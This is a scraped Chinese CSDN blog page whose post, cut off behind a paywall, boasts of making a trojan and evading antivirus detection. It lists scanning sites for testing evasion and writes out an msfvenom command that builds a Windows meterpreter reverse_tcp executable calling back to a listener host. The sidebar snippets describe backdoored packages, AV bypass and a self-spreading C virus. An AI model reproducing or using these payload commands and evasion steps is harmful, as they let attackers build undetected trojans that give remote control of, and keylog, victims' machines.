制作恶意软件并且绕过防御软件

最新推荐文章于 2023-10-09 15:36:52 发布
最新推荐文章于 2023-10-09 15:36:52 发布
阅读量549 收藏
点赞数
分类专栏: msf 笔记 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45906009/article/details/106952357
版权
本文介绍了如何制作一个恶意文件,并通过msfvenom生成加密shell,探讨了免杀技巧,包括编码器选择和去除坏字符。尽管尝试了多种方法,但免费的免杀手段效果有限,最终通过捆绑后门降低报毒率,并在Kali Linux中开启监听和键盘记录等恶意操作。
摘要由CSDN通过智能技术生成

哈哈哈哈哈哈 不行 我有点兴奋 今天成功的写了一个恶意文件 (木马病毒)
话不多说 直接开始写
首先贴几个用来测试木马是是否能过安全狗的网站
各大AV尝试库
https://www.virustotal.com
https://www.virscan.org
这个地下的杀毒
https://nodistribute.com/

下面正式开始
msfvenom 是msfpayload msfencode 结合体
生成加密shell

首先制作一个简单的

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.10.13 Lrort=4444 -f exe -o /root/a.exe

在这里插入图片描述
我们用xshell 连接一下 kali 并将其下载到本地
这边方便一下 发在本地

在这里插入图片描述
我们把写好的文件试试能不能过毒
在这里插入图片描述
很显然不能过毒 ,因为我们没有做免杀 没有加密过毒
下面我们尝试免杀过毒

msfvenom -a x86 --platform windows -p windo
最低0.47元/天 解锁文章
witcat呆
关注
专栏目录
安全防御第四天知识总结--(恶意软件、反病毒技术)
m0_56409728的博客
03-29 634
该篇文章主要介绍什么是恶意软件恶意软件的免杀技术,什么是反病毒技术,反病毒技术的工作原理,防病毒网关。
无聊做的一个小恶意程序(仅linux上)
lan_777的博客
04-17 533
无聊做了一个孤儿进程,会不断在本目录创建文件,父进程很快结束。 解决,找到进程,kill它就好了。进程名字是编译后的可执行文件名。#include<stdio.h> #include<unistd.h> int main() { FILE *fp; int pid; int i=1; char s[100]; pid=fork(); if(pid==
C#制作流氓软件
05-29
不仅因为Windows系统的脆弱,而且因为病毒无休止的自我复制和满硬盘的藏匿,使得我们脆弱的神经不堪重负,面对千疮百孔,有着莫名其妙而又千奇百怪的名字文件夹和文件的系统,相信大多数人都会选择重装系统。病毒和流氓软件总是让人气愤!那么,计算机程序怎么实现自我复制呢?其实这非常的简单。此程序就是用C#简单的实现一个能够自我复制的小小的恶意程序。(仅供学习,切勿害人)
使用MSF-msfvenom制作恶意 deb 软件来触发后门
枫梓林のBlog
04-21 601
使用MSF-msfvenom制作恶意 deb 软件来触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件来触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件 制作恶意软件使用 --download-only 方式下载软件不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
制作windows客户端恶意软件进行渗透
m0_56988395的博客
02-20 1038
目录 工具 靶机 客户端渗透原理 制作Windows恶意软件获取shell 工具 Metasploit 靶机 windows 2008 r2 相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段 注:以下内容仅供学习交流,请勿用于非法用途 客户端渗透原理 在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害
1. 制作Windows恶意软件
jazzz98的博客
10-09 603
当然也可以直接加到主程序上,但是加主程序上,有时报错。下载的文件在/var/cache/apt/archives下,移动到根目录,dpkg解压。靶机访问链接下载文件http://192.168.142.135/西瓜影音.exe,执行。启动exploit/multi/handler监听模块,设置好端口,run开始监听。创建 deb 软件,安装后脚本文件,来加载后门。当靶机运行后门程序,反弹成功,恶意软件成功连接。打开靶机,下载后门文件,添加执行权限并执行。msf启动handler监听后门程序,
ChatGPT 成黑客编写恶意软件「利」器!
程序人生的博客
01-16 666
整理 | 何苗 出品 | CSDN(ID:CSDNnews)自 ChatGPT 推出以来,引发了科技圈的广泛关注,但也有许多研究人员担心生成式 AI 在将 AI 平民化的同时也会将使网络犯罪大众化。这种担心不无道理,在某些黑客论坛,安全研究人员观察到有人使用 ChatGPT 写恶意代码的现象。近期,一个名为《ChatGPT – Benefits of Malware》的帖子出现在某个热门...
Metasploit渗透测试之制作隐藏后门:利用漏洞绕过防御机制
# 1. Metasploit渗透测试简介 ## 1.1 Metasploit简介 Metasploit是一款开源的渗透测试框架,最初由HD Moore在2003年开发。它提供了一整套渗透测试工具,括漏洞利用、后门生成、扫描等功能,为安全研究人员和渗透...
探索Al-Khaser:披露野外恶意软件技术
5. 加密和变形: 恶意软件使用加密技术来隐藏其有效载荷,并且可能采用变形技术,使得每次生成恶意软件样本都具有不同的特征码,以绕过签名基础的检测。 al-khaser的可能用途: al-khaser可以被安全研究人员和...
帆软报表绕过各种限制getshell.pdf
最新发布
04-22
- 制作恶意插件,并上传至系统中。 - 移动缓存目录到Web根目录下,以便后续操作。 - **注意事项**:确保上传的恶意插件能够成功执行。 ##### 4. 处理404错误 - **问题**:访问恶意插件创建的Shell路径时出现404...
恶意代码文档如何写
VN520的博客
04-25 201
恶意代码或恶意软件主要是指以危害信息的安全等不良意图为目的的程序,它们一般潜伏在受害计算机系统中实施破坏或窃取信息。
如何做一个流氓软件-Android系统按钮的控制
Rindia的博客
09-21 1149
最近做一个项目要需要软件,不能随便被用户关掉,所以就一直研究如实现这种效果。主要实现的功能是,关掉虚拟按钮,关掉返回键,Home,menu键,电源键,下拉顶部栏。主要就是这几个。 返回键:返回键和音量键最简单,只要在Activity中重写onkeydown方法就好了。 @Override public boolean onKeyDown(int keyCode, KeyEv
C/C++屏保工具
CodeShark的博客
07-20 374
乌拉! 让我们先来看看效果 零基础打造流氓病毒_哔哩哔哩_bilibili 知识点:API 介绍及使用 图形库使用 exe调exe 媒体控制接口 流程: 搭台唱戏:显示黑客图片 生成屏幕数字雨 播放黑客帝国音乐 固定鼠标 可选(锁定鼠标和键盘) 一、搭台唱戏 要唱戏是不是得...
打造“免杀”的恶意程序需要多久?用这个工具,只要几分钟
zimosangtian的专栏
12-11 688
转自FreeBuf http://www.freebuf.com/sectool/115915.html 意大利萨尼奥大学(the University of Sannio)的研究团队Iswatlab,证实了打造一个能够规避杀软的恶意程序有多么容易。“编写”一个新的恶意软件,规避杀软或其它防护软件的检测,这很难。但是,“制造”一个能够躲避反恶意软件解决方案的恶意软件,却很简单。“编写”和“制
C语言编写简易病毒
热门推荐
Ray的博客
09-01 7万+
本次实验设计的是一个基于C语言的恶意代码,其执行流程如下: 1、 在病毒第一次执行时,即检测到注册表的任务管理器没有被禁用,则病毒依次执行以下功能: 创建开机启动项,在系统目录路径下面复制文件,将其作为自启动路径; 禁用任务管理器; 禁用注册表编辑器; 联网获取图片并修改桌面背景(重启生效); 修改注册表屏蔽用户键盘输入为1(重启生效); 删除驱动器盘符,使桌面以及开始菜单快捷方式失
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
如何生成war
小李专栏
11-13 2万+
如何制作和部署war通常的网站,很多是以war形式发布的 下边介绍如何自行制作war 首先要求制作war的环境安装j2sdk-1.4.2以上版本 比如,安装了Plesk的服务器,就都已经具有了j2sdk 切换到j2sdk的bin目录,找到jar命令 在linux上,jar命令位于:/usr/java/j2sdk1.4.2/bin 在win上,jar命令位于:C:/Progra
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5523
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
MSF实战制作Linux恶意软件
永远是少年
06-13 1062
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件后门。 一、恶意软件生成 二、监听设置 三、效果检验
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值